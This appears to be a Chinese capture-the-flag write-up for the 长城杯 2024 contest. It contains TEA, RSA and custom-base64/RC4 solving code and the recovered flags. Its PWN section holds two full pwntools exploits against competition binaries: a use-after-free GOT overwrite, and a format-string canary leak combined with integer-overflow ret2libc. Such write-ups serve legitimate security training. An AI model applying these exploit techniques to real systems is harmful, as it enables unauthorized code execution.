长城杯 2024

MISC

base32

Re

茶

简单 tea 加密

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45


#include <stdio.h>
int main()
{
    unsigned int a1[] = {
        0x3687d089,
        0xd0d945c9,
        0x93363b71,
        0x6301bf18,
        0xf77e36a9,
        0x821920ff,
        0x8a7b77cd,
        0x50223012,
        0x5ccba996,
        0x7493212b };
 
    unsigned int a2[4] = { 0x12345678, 0x0BADF00D, 0x5201314, 0x87654321 };
    for (int i = 0; i <= 9; i+=2)
    {
        int j = 0;
        unsigned int detla = 0xc6ef3720;
        unsigned int v5 = a1[i+1];
        unsigned int v6 = a1[i];
        do
        {
            ++j;
            v5 -= (v6 + detla) ^ (a2[2] + 16 * v6) ^ ((v6 >> 5) + a2[3]);
            v6 -= (v5 + detla) ^ (*a2 + 16 * v5) ^ ((v5 >> 5) + a2[1]);
            detla += 1640531527;
            
           
        } while (j <= 31);
        a1[i + 1] = v5;
        a1[i] = v6;
    }
  
    for (int i = 0; i <=9; i++)
   {
        for (int j = 0; j <= 3; j++)
        {
            printf("%c", (a1[i] >> (j * 8)) & 0xFF);
        }
   }
    return 0;
}
//flag{7b06c572-d317-49cf-8ff2-8e402e1ea53a}

PWN

New_Old_man

堆题，存在 UAF 和后门，不知道版本瞎寄吧打，异地测试了一下 doublefree 是 8 行，那么就用 edit 改 free 后的堆块，然后再 add 就能申请到 got 表上，把随便一个库函数改成后门就完事了。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47


from pwn import *
context(log_level='debug',arch='amd64',os='linux')

io=remote('192.168.16.123',7777)

menu=b"4:This old man's case is no longer needed\n"

gift=0x4007F7

def add(idx,size,content):
    io.recvuntil(menu)
    io.sendline(b'1')
    io.recvuntil(b'need to add?\n')
    io.sendline(str(idx))
    io.recvuntil(b" need to include?:")
    io.sendline(str(size))
    io.recvuntil('write about:')
    io.send(content)

def dump(idx):
    io.recvuntil(menu)
    io.sendline(b'2')
    io.recvuntil(b'show?\n')
    io.sendline(str(idx))

def edit(idx,content):
    io.recvuntil(menu)
    io.sendline(b'3')
    io.recvuntil(b'edit?\n')
    io.sendline(str(idx))
    io.recvuntil(b'about:\n')
    io.send(content)

def dele(idx):
    io.recvuntil(menu)
    io.sendline(b'4')
    io.recvuntil(b'delete?\n')
    io.sendline(str(idx))

puts_got=0x6014D0
add(0,0x10,b'aaaa')
dele(0)
edit(0,p64(puts_got))
add(1,0x10,b'aaaa')
add(2,0x10,p64(gift))

io.interactive()

cardstore

格式化字符串可以泄 canary，但是泄不了 libc，直接泄 canary 得了，然后用整数溢出，我这次用了俩负数，前一个比较小，后一个特别小，然后就把检测都绕过了，最后直接打 ret2libc 结束了。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64


from pwn import *
context(log_level='debug',arch='amd64',os='linux')

#io=process('./cardstore')
io=remote('192.168.16.123',9999)

main=0x400A47
one=[0x45216,0x4526a,0xf02a4,0xf1147]
menu=b'your choice >>\n'
io.recvuntil(menu)

puts_plt=0x400640
puts_got=0x602018
pop_rdi_ret=0x400b73
#gdb.attach(io)
io.sendline(b'1')
io.recvuntil(b'name:\n')
io.send('%7$p%9$p')
io.recvuntil(b'0x')
canary=int(io.recv(16),16)
print('canary:',hex(canary))

#gdb.attach(io)
io.recvuntil(menu)
io.sendline(b'2')
io.recvuntil(b'How many cards do you want to add?')
io.sendline(b'-4096')
#io.interactive()
io.recvuntil(menu)

payload=flat(b'a'*0x108,canary,0xdeadbeef,pop_rdi_ret,puts_got,puts_plt,main)
io.sendline(b'3')
io.recvuntil(b'How many cards do you want to delete?')
io.sendline(b'-10000')
io.recvuntil(b'think of the game?\n')
#gdb.attach(io)
io.sendline(payload)
libc_base=u64(io.recv(6).ljust(8,b'\x00'))-0x6F690
print('libc_base:',hex(libc_base))

io.sendline(b'1')
io.recvuntil(b'name:\n')
io.send('%7$p%9$p')
io.recvuntil(b'0x')
canary=int(io.recv(16),16)
print('canary:',hex(canary))

#gdb.attach(io)
io.recvuntil(menu)
io.sendline(b'2')
io.recvuntil(b'How many cards do you want to add?')
io.sendline(b'-4096')
#io.interactive()
io.recvuntil(menu)

payload=flat(b'a'*0x108,canary,0xdeadbeef,one[0]+libc_base)
io.sendline(b'3')
io.recvuntil(b'How many cards do you want to delete?')
io.sendline(b'-10000')
io.recvuntil(b'think of the game?\n')
#gdb.attach(io)
io.sendline(payload)

io.interactive()

Crypto

babyrsa

factordb 直接分解 n，enc 文件得到 c，正常解

1
2
3
4
5
6
7
8


file_path = "flag.enc" 

with open(file_path, "rb") as file:
    byte_data = file.read()

long_data = int.from_bytes(byte_data, byteorder="big")

print(long_data)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


from Crypto.Util.number import *
import gmpy2
p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239
n = p*q
e = 65537
c = 34544884515032297361938067755521025059722878179437961977941604148701451922996
phi = (p-1) * (q-1)
d = gmpy2.invert(e, phi)
m = pow(c,d,n)
print(long_to_bytes(m))
# b"\x02\xb7 \xe9\x88b\xbd\x8c\x85\xb4\xddJ5\xab\x00flag{i'mdidi???}"

Simple code

首先是用 encrypt 还原 base64 编码表，代码给出的就是解密的过程

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


#include<stdio.h>
#include<string.h>
#include <string>
#include <iostream>
using namespace std;
int inputcode[] =
{ 0xD0,0xCF,0xD2,0xD1,0xD4,0xD3,0xD6,0xD5,0xC8,0xC7,0xD9,0xDD,0x1F,
0x22,0x21,0x24,0x23,0x26,0x25,0x18,0x17,0x1A,0x19,0x1C,0x1B,0x1E,
0x1D,0x10,0xF,0x12,0x11,0x14,0x13,0x16,0x15,0x8,0x7,0xA,0x3F,0x42,
0x41,0x44,0x43,0x46,0x45,0x38,0x37,0x3A,0x39,0x3C,0x3B,0x3E,0x3D,
0x30,0x2F,0x32,0x31,0x34,0x33,0x36,0x35,0x28,0x27,0x2A };

void check(int* input) {
        for (int i = 0; i < 64; ++i) {
                printf("%c",(((input[i] + 0x39) & 0xff) ^ 0x39));
        }
}
int main(){
        check(inputcode);
}

变表 base64 解密

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


import base64
# 原表
origin = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
# 变表

base =   "0123456789+/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
# 密文
c = "ZprSLiqOlcUFIQEpQQvPtiZWI41oSPk3T6Ztxc/LLCS="
# 映射表
table = str.maketrans(base,origin)
# 明文
m = base64.b64decode(c.translate(table))
for i in m:
    print(hex(i),end=',')
# 0xb,0xc4,0x23,0x8c,0x1f,0x48,0xaf,0x8c,0x43,0xa2,0x99,0x33,0x1e,0xc1,0x42,0xbb,0x8a,0xd1,0x41,0x48,0x9a,0x8d,0xa9,0xb9,0xc6,0x47,0x20,0x7f,0x2b,0x44,0xce,0xd3,0x70

rc4 的 key 有问题，加个等号解 base 还原
然后密文塞到输入就出了

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125


#include<stdio.h>
#include<string.h>
#include <string>
#include <iostream>
using namespace std;
static const char inputcode[] =
{ "0123456789+/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"};

int16_t Gen(unsigned char* indata, uint16_t inlen, unsigned char* outdata)
{
        uint16_t i, j;
        for (i = 0, j = 0; i < (inlen / 3) * 3; i = i + 3, j = j + 4)
        {
                outdata[j] = 0;   
                outdata[j + 1] = 0;
                outdata[j + 2] = 0;
                outdata[j + 3] = 0;
                outdata[j] = indata[i] >> 2;
                outdata[j + 1] = (((indata[i] & 0x03) << 4) | (indata[i + 1] >> 4));
                outdata[j + 2] = (((indata[i + 1] & 0x0F) << 2) | ((indata[i + 2] & 0xC0) >> 6));
                outdata[j + 3] = (indata[i + 2] & 0x3F);
        }
        for (i = 0; i < j; i++)
        {
                outdata[i] = inputcode[outdata[i]];
        }
        if ((inlen % 3) == 1)
        {
                outdata[i] = 0;   
                outdata[i + 1] = 0;
                outdata[i + 2] = 0;
                outdata[i + 3] = 0;
                outdata[i] = indata[inlen - 1] >> 2;
                outdata[i + 1] = ((indata[inlen - 1] & 0x03) << 4);
                outdata[i] = inputcode[outdata[i]];
                outdata[i + 1] = inputcode[outdata[i + 1]];
                outdata[i + 2] = '=';
                outdata[i + 3] = '=';
                i = i + 4;
        }
        if ((inlen % 3) == 2)
        {
                outdata[i] = 0;    
                outdata[i + 1] = 0;
                outdata[i + 2] = 0;
                outdata[i + 3] = 0;
                outdata[i] = indata[inlen - 2] >> 2;
                outdata[i + 1] = (((indata[inlen - 2] & 0x03) << 4) | (indata[inlen - 1] >> 4));
                outdata[i + 2] = (indata[inlen - 1] & 0x0F) << 2;
                outdata[i] = inputcode[outdata[i]];
                outdata[i + 1] = inputcode[outdata[i + 1]];
                outdata[i + 2] = inputcode[outdata[i + 2]];
                outdata[i + 3] = '=';
                i = i + 4;
        }
        return i;   
}

void encode(unsigned char* S_table, unsigned char* T_table, unsigned char* arr, unsigned int len, unsigned char* k, unsigned int len_k)
{
        int i, j = 0, tmp, key, index = 0;
        for (i = 0; i < 256; i++)
        {
                S_table[i] = i;
                T_table[i] = k[i % len_k];
        }
        for (i = 0; i < 256; i++)
        {
                j = (j + S_table[i] + T_table[i]) % 256;
                tmp = S_table[j];
                S_table[j] = S_table[i];
                S_table[i] = tmp;
        }
        i = 0;
        j = 0;
        while (len > 0)
        {
                i = (i + 1) % 256;
                j = (j + S_table[i]) % 256;
                tmp = S_table[j];
                S_table[j] = S_table[i];
                S_table[i] = tmp;
                key = (S_table[i] + S_table[j]) % 256;
                arr[index] = arr[index] ^ S_table[key];
                printf("%c",arr[index]);
                index++;
                len--;
        }
}


int main()
{
        
        unsigned char arr[33] = {0xfd,0xb7,0x78,0xc5,0x47,0x34,0x5c,0xee,0xab,0xbb,0x6a,0x9b,0xdb,0x68,0x75,0x7d,0x4f,0xfc,0xb8,0x40,0x5a,0xe3,0x55,0x83,0xe4,0x6f,0xdf,0x8c,0xe2,0xf1,0xc6,0x8e}, 
        data[] = { 0x5A, 0x70, 0x72, 0x53, 0x4C, 0x69, 0x71, 0x4F, 0x6C, 0x63, 0x55, 0x46, 0x49, 0x51, 0x45, 0x70,
        0x51, 0x51, 0x76, 0x50, 0x74, 0x69, 0x5A, 0x57, 0x49, 0x34, 0x31, 0x6F, 0x53, 0x50, 0x6B, 0x33,
        0x54, 0x36, 0x5A, 0x74, 0x78, 0x63, 0x2F, 0x4C, 0x4C, 0x43, 0x53, 0x3D };
        unsigned char S_table[256] = { 0 }, T_table[256] = { 0 }, k[] = { "democtf1" };
        int flag = 0;

        int n = strlen((const char*)arr);
        if ( n == 32)
        {
                encode(S_table, T_table, arr, sizeof(arr), k, sizeof(k) - 1);
        }
        else
        {
                printf("try again~");
                return 0;
        }
        unsigned char encoded[50] = {0};
        Gen(arr, n, encoded);
        n = strlen((const char*)encoded);
        for (int i = 0; i < n ; i++)
        {
                if (data[i] == encoded[i])
                        flag++;
        }
        if (flag == 44)
                printf("right!");
        else
                printf("try again~");
        return 0;
}

flag{qwq_crypt_ctf_ffffis_aaa!!}